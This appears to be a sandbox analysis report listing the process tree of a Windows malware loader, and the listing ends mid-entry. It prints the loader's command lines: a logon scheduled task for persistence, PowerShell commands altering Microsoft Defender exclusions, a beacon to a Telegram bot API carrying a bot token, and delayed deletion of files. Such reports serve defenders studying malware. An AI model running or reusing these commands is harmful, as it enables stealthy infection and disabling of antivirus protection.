                                                                                                                                                                                                Start time:04:46:49
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                                                Imagebase:0x7ff6b6760000
                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:59
                                                                                                                                                                                                Start time:04:46:50
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:60
                                                                                                                                                                                                Start time:04:46:50
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:61
                                                                                                                                                                                                Start time:04:46:50
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\bav64.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\bav64.exe"
                                                                                                                                                                                                Imagebase:0x7ff733770000
                                                                                                                                                                                                File size:517'632 bytes
                                                                                                                                                                                                MD5 hash:54EEFA1EAEAB32575A1BDF407327C5DA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:62
                                                                                                                                                                                                Start time:04:46:50
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:63
                                                                                                                                                                                                Start time:04:46:50
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:64
                                                                                                                                                                                                Start time:04:46:50
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:65
                                                                                                                                                                                                Start time:04:46:51
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:66
                                                                                                                                                                                                Start time:04:46:51
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:67
                                                                                                                                                                                                Start time:04:46:51
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:68
                                                                                                                                                                                                Start time:04:46:51
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:69
                                                                                                                                                                                                Start time:04:46:51
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:70
                                                                                                                                                                                                Start time:04:46:51
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:71
                                                                                                                                                                                                Start time:04:46:51
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\console_zero.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\console_zero.exe
                                                                                                                                                                                                Imagebase:0x7ff6bc070000
                                                                                                                                                                                                File size:664'064 bytes
                                                                                                                                                                                                MD5 hash:49672519E74E8AD135DAE7345BCEFF41
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:72
                                                                                                                                                                                                Start time:04:46:53
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                                                Imagebase:0x7ff6068e0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:73
                                                                                                                                                                                                Start time:04:46:54
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:74
                                                                                                                                                                                                Start time:04:46:53
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:75
                                                                                                                                                                                                Start time:04:46:53
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:76
                                                                                                                                                                                                Start time:04:46:54
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:77
                                                                                                                                                                                                Start time:04:46:55
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                                                Imagebase:0x7ff6b6760000
                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:78
                                                                                                                                                                                                Start time:04:46:55
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:79
                                                                                                                                                                                                Start time:04:46:55
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:80
                                                                                                                                                                                                Start time:04:46:55
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:81
                                                                                                                                                                                                Start time:04:46:57
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:82
                                                                                                                                                                                                Start time:04:46:57
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:83
                                                                                                                                                                                                Start time:04:46:57
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:84
                                                                                                                                                                                                Start time:04:47:00
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:85
                                                                                                                                                                                                Start time:04:47:00
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:86
                                                                                                                                                                                                Start time:04:47:00
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:87
                                                                                                                                                                                                Start time:04:47:02
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:88
                                                                                                                                                                                                Start time:04:47:02
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:89
                                                                                                                                                                                                Start time:04:47:02
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:90
                                                                                                                                                                                                Start time:04:47:02
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:91
                                                                                                                                                                                                Start time:04:47:02
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:92
                                                                                                                                                                                                Start time:04:47:02
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 14 /nobreak
                                                                                                                                                                                                Imagebase:0x7ff6c9000000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:93
                                                                                                                                                                                                Start time:04:47:03
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:94
                                                                                                                                                                                                Start time:04:47:03
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:95
                                                                                                                                                                                                Start time:04:47:03
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 16 /nobreak
                                                                                                                                                                                                Imagebase:0x7ff6c9000000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:96
                                                                                                                                                                                                Start time:04:47:04
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:97
                                                                                                                                                                                                Start time:04:47:04
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
